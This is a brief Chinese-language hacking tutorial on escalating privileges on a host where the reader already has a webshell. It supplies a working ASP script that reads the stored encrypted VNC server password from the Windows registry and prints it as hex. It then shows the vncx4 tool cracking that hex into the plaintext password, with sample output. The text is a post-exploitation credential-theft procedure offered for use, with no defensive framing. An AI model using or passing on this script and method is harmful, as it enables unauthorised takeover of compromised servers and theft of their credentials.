如何利用VNC服务提升权限

很多时候大家提升权限一般用SERVU，或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的，而且是图形界面，功能和远程终端类似。

如果得到了一个主机的WEBSHELL，想提升权限，发现主机运行了VNC服务，就可以考虑用下面的方法。

默认情况下VNC服务端的密码是放在注册表中的，本文只针对这种情况。

首先用ASP读出注册表中的加密密码，然后用破解工具破解。

我给出大家一个读取VNC密码的ASP脚本，默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

Set WshShell = server.CreateObject("WScript.Shell")
bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")
for each str in bkey
response.write hex(str)
next

读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制，这是VNC加密的密码。我们可以用vncx4

破解它，vncx4使用很简单，只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。

比如我给个测试

H:\tool>vncx4 -W
49
40
15
F9
A3
5E
8B
22
Entered HEX String: 49 40 15 f9 a3 5e 8b 22
VNC Password: 123456